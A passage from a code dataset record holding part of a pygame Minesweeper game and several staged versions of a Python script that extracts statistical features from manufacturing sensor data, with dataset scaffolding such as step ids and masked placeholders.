if not self.revealed_cells[cell_x][cell_y] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n\n # Digging somewhere\n if not self.revealed_cells[cell_x][cell_y] and left_click and not self.game_over:\n\n # So you can't accidentally click a flagged/question mark space\n if not self.flags[cell_x][cell_y] and not self.questionmarks[cell_x][cell_y]:\n\n self.flags[cell_x][cell_y] = False\n\n if self.board[cell_x][cell_y][0] == MINE: # If you dig a mine, reveal all cells & game over\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n\n elif self.board[cell_x][cell_y][0] == CLEAR: # If you dig a clear cell, reveal that cell\n self.reveal_cells(cell_x, cell_y, self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n else:\n self.revealed_cells[cell_x][cell_y] = True # Set the cell as revealed\n\n # Redraw board after mouse event\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n # Placing a flag- if flag already there, change flag to question mark.\n # If question mark already there, turn to nothing. If nothing there, turn on flag\n if not self.revealed_cells[cell_x][cell_y] and right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n\n # Flag is drawn in this method call\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n # This block decides whether or not the player has won yet after a mouse event\n win = True\n for x in range(GRID_WIDTH): # If a cell is a mine and not flagged, or if a cell is clear\n for y in range(GRID_HEIGHT): # but not revealed, then the game is not yet over\n if (self.board[x][y][0] == MINE and not self.flags[x][y]) or (\n self.board[x][y][0] != MINE and not self.revealed_cells[x][y]):\n win = False\n\n if win:\n self.game_over = True\n\n # Redraw the screen and wait for clock tick\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n\n # Bottom of board is made of only mines and clear cells, which is then selectively covered for gameplay\n # Making randomized array\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n\n # Create static under-board\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0] # so the next icon[0] is the one after this\n board.append(column)\n\n # This block determines how many mines are around each cell, and adds the number to the board's array\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n\n if x > 0:\n if y > 0: # If not on the left edge AND not on top edge\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n\n if x < GRID_WIDTH - 1:\n if y > 0: # If not on right edge AND not on top edge\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n\n if y > 0: # If not on right or left edge AND not on top edge\n if board[x][y - 1][0] == MINE:\n mines += 1\n\n if y < GRID_HEIGHT - 1: # If not on riht or left edge AND on bottom edge\n if board[x][y + 1][0] == MINE:\n mines += 1\n\n # If the cell is clear and there are mines around it, add the number of mines to board array\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = (str(mines), WHITE)\n\n return board\n\n # Used to show full board on game over & reset board on game start\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n # Convert row, column coordinates into x, y pixel coordinates (for drawing shapes)\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n # Convert x, y pixel coordinates to row, column coordinates (for mouse hovering)\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y): # If currently hovering over a cell\n return cell_x, cell_y\n return None, None # If not currently hovering over a cell\n\n # Redraws board after mouse event\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n\n # Symbols not added on board creation must be drawn here: \"unrevealed\" boxes, flags, and question marks\n if not revealed[cell_x][cell_y]:\n # Draw a gray box over unrevealed cell, so value isn't affected but user can't see the value\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5) # Relative point halfway through cell\n # top point, bottom left point, bottom right point\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half + left, top),\n (left, top + CELL_SIDE_LENGTH - CELL_MARGIN/2),\n (left + CELL_SIDE_LENGTH - CELL_MARGIN/2, top +\n CELL_SIDE_LENGTH - CELL_MARGIN/2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont(\"times new roman\", fontsize)\n label = font.render(\"?\", 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n else: # Draw revealed cells\n shape, color = self.get_shape_and_color(board, cell_x, cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n # Draws icon passed to it in the stated cell\n def draw_icon(self, shape, color, cell_x, cell_y):\n\n # Relative point of quarter-way through cell\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n\n left, top = self.get_top_left_coordinates(cell_x, cell_y) # Drawing of all images starts at top left corner\n\n # Draw the shapes\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n # Flag shape & question mark in draw_board because they are activated via mouse event\n\n else: # Clear with num\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont(\"times new roman\", fontsize)\n label = font.render(shape, 1, BLACK) # a cell with number corresponds to shapes \"1\", \"2\", etc.\n SURFACE.blit(label, (left + quarter, top))\n\n # Returns the shape and color of icon to be created in draw_icon method\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n # shape value for cell x, y is stored in board[x][y][0], color value in board[x][y][1]\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n\n # Draws a box around the cell the mouse is hovering over, 'highlighting' it\n def highlight_cell(self, cell_x, cell_y):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n # Changes with cell size, but line width is hard-set at 2px (last argument)\n pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - (CELL_MARGIN / 2), top - (CELL_MARGIN / 2),\n CELL_SIDE_LENGTH + CELL_MARGIN, CELL_SIDE_LENGTH + CELL_MARGIN), 2)\n\n # Reveals clear cells next to clear cell the user clicked (and clear cells next to those cells, etc.)\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]: # If the cell is already revealed, do nothing\n return\n if flags[x][y]: # If the cell already has a flag on it, do nothing\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags, questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags, questionmarks)\n\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags, questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags, questionmarks)\n\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont(\"times new roman\", 20)\n label = font.render(\" High scores\", 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50)) # view high scores\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\ng = Game()\ng.main()\n", "step-ids": [ 10, 16, 17, 21, 22 ] }
[ 10, 16, 17, 21, 22 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def file_name(file_dir): root_tmp = [] dirs_tmp = [] files_tmp = [] for root, dirs, files in os.walk(file_dir): root_tmp.append(root) dirs_tmp.append(dirs) files_tmp.append(files) return root_tmp, dirs_tmp, files_tmp <|reserved_special_token_0|> for key in lot_list: if key in combined_all.keys(): print('The Lot %d in %s already existed in %s' % (key, file_tmp, combined_all[key])) <|reserved_special_token_0|> for row_tmp in df.index: lot_tmp = df.iloc[row_tmp, :].Lot if lot_tmp == lot_last: list_tmp.append(df.iloc[row_tmp, :]) counter += 1 else: df_tmp = pd.concat(list_tmp, axis=1) combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T feature_tmp = df_tmp.T.iloc[:, 7:] feature_tmp = df_scaler.fit_transform(feature_tmp) t1 = np.mean(feature_tmp) t2 = np.std(feature_tmp) t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2 t4 = np.sqrt(np.mean(feature_tmp ** 2)) t5 = np.max(feature_tmp) t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 ** 3) t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 ** 4) t8 = t5 / t4 t9 = t5 / t3 t10 = t4 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp)) t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp)) feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10, t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T. recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last] list_tmp = [] idx += 1 counter = 0 lot_last = lot_tmp print(row_tmp) <|reserved_special_token_1|> <|reserved_special_token_0|> def file_name(file_dir): root_tmp = [] dirs_tmp = [] files_tmp = [] for root, dirs, files in os.walk(file_dir): root_tmp.append(root) dirs_tmp.append(dirs) files_tmp.append(files) return root_tmp, dirs_tmp, files_tmp root = '/home/ninja1mmm/Desktop/phm/data' root_tmp, dirs_tmp, files_tmp = file_name(root) combined_all = {} feature_all = pd.DataFrame(columns=['mean', 'std', 'root amplitude', 'rms', 'max', 'skewness', 'kurtosis', 'peak factor', 'margin', 'waveform', 'pulse', 'start_time', 'end_time', 'recipe', 'stage', 'Lot']) file_tmp = files_tmp[2][0] path_tmp = root_tmp[2] + '/' + file_tmp df = pd.read_pickle(path_tmp) df = df.replace([np.inf, -np.inf], np.nan).dropna() df = df.reset_index(drop=True) df_scaler = preprocessing.MinMaxScaler(feature_range=(0, 1)) lot_list = list(set(df.Lot)) for key in lot_list: if key in combined_all.keys(): print('The Lot %d in %s already existed in %s' % (key, file_tmp, combined_all[key])) list_tmp = [] lot_last = df.Lot[0] counter = 0 idx = 0 for row_tmp in df.index: lot_tmp = df.iloc[row_tmp, :].Lot if lot_tmp == lot_last: list_tmp.append(df.iloc[row_tmp, :]) counter += 1 else: df_tmp = pd.concat(list_tmp, axis=1) combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T feature_tmp = df_tmp.T.iloc[:, 7:] feature_tmp = df_scaler.fit_transform(feature_tmp) t1 = np.mean(feature_tmp) t2 = np.std(feature_tmp) t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2 t4 = np.sqrt(np.mean(feature_tmp ** 2)) t5 = np.max(feature_tmp) t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 ** 3) t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 ** 4) t8 = t5 / t4 t9 = t5 / t3 t10 = t4 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp)) t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp)) feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10, t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T. recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last] list_tmp = [] idx += 1 counter = 0 lot_last = lot_tmp print(row_tmp) <|reserved_special_token_1|> <|reserved_special_token_0|> import os import numpy as np import pandas as pd from sklearn import preprocessing def file_name(file_dir): root_tmp = [] dirs_tmp = [] files_tmp = [] for root, dirs, files in os.walk(file_dir): root_tmp.append(root) dirs_tmp.append(dirs) files_tmp.append(files) return root_tmp, dirs_tmp, files_tmp root = '/home/ninja1mmm/Desktop/phm/data' root_tmp, dirs_tmp, files_tmp = file_name(root) combined_all = {} feature_all = pd.DataFrame(columns=['mean', 'std', 'root amplitude', 'rms', 'max', 'skewness', 'kurtosis', 'peak factor', 'margin', 'waveform', 'pulse', 'start_time', 'end_time', 'recipe', 'stage', 'Lot']) file_tmp = files_tmp[2][0] path_tmp = root_tmp[2] + '/' + file_tmp df = pd.read_pickle(path_tmp) df = df.replace([np.inf, -np.inf], np.nan).dropna() df = df.reset_index(drop=True) df_scaler = preprocessing.MinMaxScaler(feature_range=(0, 1)) lot_list = list(set(df.Lot)) for key in lot_list: if key in combined_all.keys(): print('The Lot %d in %s already existed in %s' % (key, file_tmp, combined_all[key])) list_tmp = [] lot_last = df.Lot[0] counter = 0 idx = 0 for row_tmp in df.index: lot_tmp = df.iloc[row_tmp, :].Lot if lot_tmp == lot_last: list_tmp.append(df.iloc[row_tmp, :]) counter += 1 else: df_tmp = pd.concat(list_tmp, axis=1) combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T feature_tmp = df_tmp.T.iloc[:, 7:] feature_tmp = df_scaler.fit_transform(feature_tmp) t1 = np.mean(feature_tmp) t2 = np.std(feature_tmp) t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2 t4 = np.sqrt(np.mean(feature_tmp ** 2)) t5 = np.max(feature_tmp) t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 ** 3) t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 ** 4) t8 = t5 / t4 t9 = t5 / t3 t10 = t4 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp)) t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp)) feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10, t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T. recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last] list_tmp = [] idx += 1 counter = 0 lot_last = lot_tmp print(row_tmp) <|reserved_special_token_1|> #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Jul 18 13:37:10 2018 @author: ninja1mmm """ import os import numpy as np import pandas as pd from sklearn import preprocessing def file_name(file_dir): root_tmp=[] dirs_tmp=[] files_tmp=[] for root, dirs, files in os.walk(file_dir): root_tmp.append(root) dirs_tmp.append(dirs) files_tmp.append(files) return root_tmp, dirs_tmp, files_tmp root = '/home/ninja1mmm/Desktop/phm/data' root_tmp, dirs_tmp, files_tmp = file_name(root) combined_all = {} feature_all = pd.DataFrame(columns = ['mean', 'std','root amplitude', 'rms','max','skewness','kurtosis', 'peak factor','margin','waveform', 'pulse','start_time', 'end_time', 'recipe', 'stage', 'Lot']) #df_check = pd.DataFrame() # read the first file to test here file_tmp = files_tmp[2][0] # iterate through the files if needed #for file_tmp in files_tmp[2]: path_tmp = root_tmp[2]+'/'+file_tmp df = pd.read_pickle(path_tmp) #df_tmp = df[df['Lot']==28113] #if len(df_tmp)>0: # df_tmp = df_tmp.iloc[0,:] # df_check = df_check.append(df_tmp) #------------------------------------------------------------------------------ # Crucial step df=df.replace([np.inf, -np.inf], np.nan).dropna() df=df.reset_index(drop=True) df_scaler = preprocessing.MinMaxScaler(feature_range = (0,1)) #------------------------------------------------------------------------------ lot_list = list(set(df.Lot)) # Check if Lot already existed for key in lot_list: if key in combined_all.keys(): print('The Lot %d in %s already existed in %s' % (key, file_tmp, combined_all[key])) # for tmp in lot_list: # combined_all[tmp] = file_tmp # Select and save all the wafer processing cycles list_tmp = [] lot_last = df.Lot[0] counter = 0 idx = 0 # Specify the range. Here set to 100000 for the ease of test for row_tmp in df.index: lot_tmp = df.iloc[row_tmp,:].Lot if lot_tmp == lot_last: list_tmp.append(df.iloc[row_tmp,:]) counter += 1 else: df_tmp = pd.concat(list_tmp, axis = 1) # lot_last serves as the key, can be changed # combined_all[lot_last] = df_tmp.T combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T # Calculate mean and save in feature dictionary as an example # Normalize the data again because for some parameters we need the local (within cycle) feature feature_tmp = df_tmp.T.iloc[:,7:] # Not a correct way, because shutter position also need to be excluded feature_tmp = df_scaler.fit_transform(feature_tmp) # ------------------------------------------------------------------ # Add features here. Remember to add new columns when initialzing df t1 = np.mean(feature_tmp) t2 = np.std(feature_tmp) t3 = np.mean(np.sqrt(np.abs(feature_tmp)))**2 t4 = np.sqrt(np.mean(feature_tmp**2)) t5 = np.max(feature_tmp) t6 = np.sum((feature_tmp-t1)**3)/((len(feature_tmp)-1)*(t2**3)) t7 = np.sum((feature_tmp-t1)**4)/((len(feature_tmp)-1)*(t2**4)) t8 = t5/t4 t9 = t5/t3 t10 = t4/(np.sum(np.abs(feature_tmp))/len(feature_tmp)) t11 = t5/(np.sum(np.abs(feature_tmp))/(len(feature_tmp))) # Newly added # First order difference # --------------------------------------------------------------------- feature_all.loc[idx,:] = [t1,t2,t3,t4,t5,t6,t7,t8,t9,t10,t11, df_tmp.T.time.iloc[0],df_tmp.T.time.iloc[-1], df_tmp.T.recipe.iloc[0],df_tmp.T.stage.iloc[0], lot_last] list_tmp = [] idx += 1 counter = 0 lot_last = lot_tmp print(row_tmp) #------------------------------------------------------------------------------
flexible
{ "blob_id": "96d5cf948a9b0f622889977e8b26993299bceead", "index": 770, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef file_name(file_dir):\n root_tmp = []\n dirs_tmp = []\n files_tmp = []\n for root, dirs, files in os.walk(file_dir):\n root_tmp.append(root)\n dirs_tmp.append(dirs)\n files_tmp.append(files)\n return root_tmp, dirs_tmp, files_tmp\n\n\n<mask token>\nfor key in lot_list:\n if key in combined_all.keys():\n print('The Lot %d in %s already existed in %s' % (key, file_tmp,\n combined_all[key]))\n<mask token>\nfor row_tmp in df.index:\n lot_tmp = df.iloc[row_tmp, :].Lot\n if lot_tmp == lot_last:\n list_tmp.append(df.iloc[row_tmp, :])\n counter += 1\n else:\n df_tmp = pd.concat(list_tmp, axis=1)\n combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T\n feature_tmp = df_tmp.T.iloc[:, 7:]\n feature_tmp = df_scaler.fit_transform(feature_tmp)\n t1 = np.mean(feature_tmp)\n t2 = np.std(feature_tmp)\n t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2\n t4 = np.sqrt(np.mean(feature_tmp ** 2))\n t5 = np.max(feature_tmp)\n t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 **\n 3)\n t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 **\n 4)\n t8 = t5 / t4\n t9 = t5 / t3\n t10 = t4 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10,\n t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T.\n recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last]\n list_tmp = []\n idx += 1\n counter = 0\n lot_last = lot_tmp\n print(row_tmp)\n", "step-3": "<mask token>\n\n\ndef file_name(file_dir):\n root_tmp = []\n dirs_tmp = []\n files_tmp = []\n for root, dirs, files in os.walk(file_dir):\n root_tmp.append(root)\n dirs_tmp.append(dirs)\n files_tmp.append(files)\n return root_tmp, dirs_tmp, files_tmp\n\n\nroot = '/home/ninja1mmm/Desktop/phm/data'\nroot_tmp, dirs_tmp, files_tmp = file_name(root)\ncombined_all = {}\nfeature_all = pd.DataFrame(columns=['mean', 'std', 'root amplitude', 'rms',\n 'max', 'skewness', 'kurtosis', 'peak factor', 'margin', 'waveform',\n 'pulse', 'start_time', 'end_time', 'recipe', 'stage', 'Lot'])\nfile_tmp = files_tmp[2][0]\npath_tmp = root_tmp[2] + '/' + file_tmp\ndf = pd.read_pickle(path_tmp)\ndf = df.replace([np.inf, -np.inf], np.nan).dropna()\ndf = df.reset_index(drop=True)\ndf_scaler = preprocessing.MinMaxScaler(feature_range=(0, 1))\nlot_list = list(set(df.Lot))\nfor key in lot_list:\n if key in combined_all.keys():\n print('The Lot %d in %s already existed in %s' % (key, file_tmp,\n combined_all[key]))\nlist_tmp = []\nlot_last = df.Lot[0]\ncounter = 0\nidx = 0\nfor row_tmp in df.index:\n lot_tmp = df.iloc[row_tmp, :].Lot\n if lot_tmp == lot_last:\n list_tmp.append(df.iloc[row_tmp, :])\n counter += 1\n else:\n df_tmp = pd.concat(list_tmp, axis=1)\n combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T\n feature_tmp = df_tmp.T.iloc[:, 7:]\n feature_tmp = df_scaler.fit_transform(feature_tmp)\n t1 = np.mean(feature_tmp)\n t2 = np.std(feature_tmp)\n t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2\n t4 = np.sqrt(np.mean(feature_tmp ** 2))\n t5 = np.max(feature_tmp)\n t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 **\n 3)\n t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 **\n 4)\n t8 = t5 / t4\n t9 = t5 / t3\n t10 = t4 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10,\n t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T.\n recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last]\n list_tmp = []\n idx += 1\n counter = 0\n lot_last = lot_tmp\n print(row_tmp)\n", "step-4": "<mask token>\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\n\n\ndef file_name(file_dir):\n root_tmp = []\n dirs_tmp = []\n files_tmp = []\n for root, dirs, files in os.walk(file_dir):\n root_tmp.append(root)\n dirs_tmp.append(dirs)\n files_tmp.append(files)\n return root_tmp, dirs_tmp, files_tmp\n\n\nroot = '/home/ninja1mmm/Desktop/phm/data'\nroot_tmp, dirs_tmp, files_tmp = file_name(root)\ncombined_all = {}\nfeature_all = pd.DataFrame(columns=['mean', 'std', 'root amplitude', 'rms',\n 'max', 'skewness', 'kurtosis', 'peak factor', 'margin', 'waveform',\n 'pulse', 'start_time', 'end_time', 'recipe', 'stage', 'Lot'])\nfile_tmp = files_tmp[2][0]\npath_tmp = root_tmp[2] + '/' + file_tmp\ndf = pd.read_pickle(path_tmp)\ndf = df.replace([np.inf, -np.inf], np.nan).dropna()\ndf = df.reset_index(drop=True)\ndf_scaler = preprocessing.MinMaxScaler(feature_range=(0, 1))\nlot_list = list(set(df.Lot))\nfor key in lot_list:\n if key in combined_all.keys():\n print('The Lot %d in %s already existed in %s' % (key, file_tmp,\n combined_all[key]))\nlist_tmp = []\nlot_last = df.Lot[0]\ncounter = 0\nidx = 0\nfor row_tmp in df.index:\n lot_tmp = df.iloc[row_tmp, :].Lot\n if lot_tmp == lot_last:\n list_tmp.append(df.iloc[row_tmp, :])\n counter += 1\n else:\n df_tmp = pd.concat(list_tmp, axis=1)\n combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T\n feature_tmp = df_tmp.T.iloc[:, 7:]\n feature_tmp = df_scaler.fit_transform(feature_tmp)\n t1 = np.mean(feature_tmp)\n t2 = np.std(feature_tmp)\n t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2\n t4 = np.sqrt(np.mean(feature_tmp ** 2))\n t5 = np.max(feature_tmp)\n t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 **\n 3)\n t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 **\n 4)\n t8 = t5 / t4\n t9 = t5 / t3\n t10 = t4 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10,\n t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T.\n recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last]\n list_tmp = []\n idx += 1\n counter = 0\n lot_last = lot_tmp\n print(row_tmp)\n", "step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 18 13:37:10 2018\n\n@author: ninja1mmm\n\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\n\ndef file_name(file_dir): \n root_tmp=[]\n dirs_tmp=[]\n files_tmp=[]\n for root, dirs, files in os.walk(file_dir): \n root_tmp.append(root)\n dirs_tmp.append(dirs)\n files_tmp.append(files)\n return root_tmp, dirs_tmp, files_tmp\n \n \nroot = '/home/ninja1mmm/Desktop/phm/data'\nroot_tmp, dirs_tmp, files_tmp = file_name(root)\n\ncombined_all = {}\nfeature_all = pd.DataFrame(columns = ['mean', 'std','root amplitude',\n 'rms','max','skewness','kurtosis',\n 'peak factor','margin','waveform',\n 'pulse','start_time', 'end_time',\n 'recipe', 'stage', 'Lot'])\n#df_check = pd.DataFrame()\n\n# read the first file to test here\nfile_tmp = files_tmp[2][0]\n# iterate through the files if needed\n#for file_tmp in files_tmp[2]:\n \npath_tmp = root_tmp[2]+'/'+file_tmp\ndf = pd.read_pickle(path_tmp)\n#df_tmp = df[df['Lot']==28113]\n#if len(df_tmp)>0:\n# df_tmp = df_tmp.iloc[0,:]\n# df_check = df_check.append(df_tmp)\n #------------------------------------------------------------------------------\n# Crucial step\ndf=df.replace([np.inf, -np.inf], np.nan).dropna()\ndf=df.reset_index(drop=True)\ndf_scaler = preprocessing.MinMaxScaler(feature_range = (0,1))\n\n#------------------------------------------------------------------------------\n \n\n\n\nlot_list = list(set(df.Lot))\n# Check if Lot already existed\nfor key in lot_list:\n if key in combined_all.keys():\n print('The Lot %d in %s already existed in %s' % (key, file_tmp, \n combined_all[key]))\n \n# for tmp in lot_list:\n# combined_all[tmp] = file_tmp\n# Select and save all the wafer processing cycles\nlist_tmp = []\nlot_last = df.Lot[0]\ncounter = 0\nidx = 0\n# Specify the range. Here set to 100000 for the ease of test\nfor row_tmp in df.index:\n lot_tmp = df.iloc[row_tmp,:].Lot\n if lot_tmp == lot_last:\n list_tmp.append(df.iloc[row_tmp,:])\n counter += 1\n else:\n df_tmp = pd.concat(list_tmp, axis = 1)\n # lot_last serves as the key, can be changed \n# combined_all[lot_last] = df_tmp.T\n combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T\n # Calculate mean and save in feature dictionary as an example\n # Normalize the data again because for some parameters we need the local (within cycle) feature\n feature_tmp = df_tmp.T.iloc[:,7:] # Not a correct way, because shutter position also need to be excluded\n feature_tmp = df_scaler.fit_transform(feature_tmp)\n# ------------------------------------------------------------------\n # Add features here. Remember to add new columns when initialzing df\n t1 = np.mean(feature_tmp) \n t2 = np.std(feature_tmp)\n t3 = np.mean(np.sqrt(np.abs(feature_tmp)))**2\n t4 = np.sqrt(np.mean(feature_tmp**2))\n t5 = np.max(feature_tmp)\n t6 = np.sum((feature_tmp-t1)**3)/((len(feature_tmp)-1)*(t2**3))\n t7 = np.sum((feature_tmp-t1)**4)/((len(feature_tmp)-1)*(t2**4))\n t8 = t5/t4\n t9 = t5/t3\n t10 = t4/(np.sum(np.abs(feature_tmp))/len(feature_tmp))\n t11 = t5/(np.sum(np.abs(feature_tmp))/(len(feature_tmp)))\n # Newly added\n \n \n # First order difference\n \n# 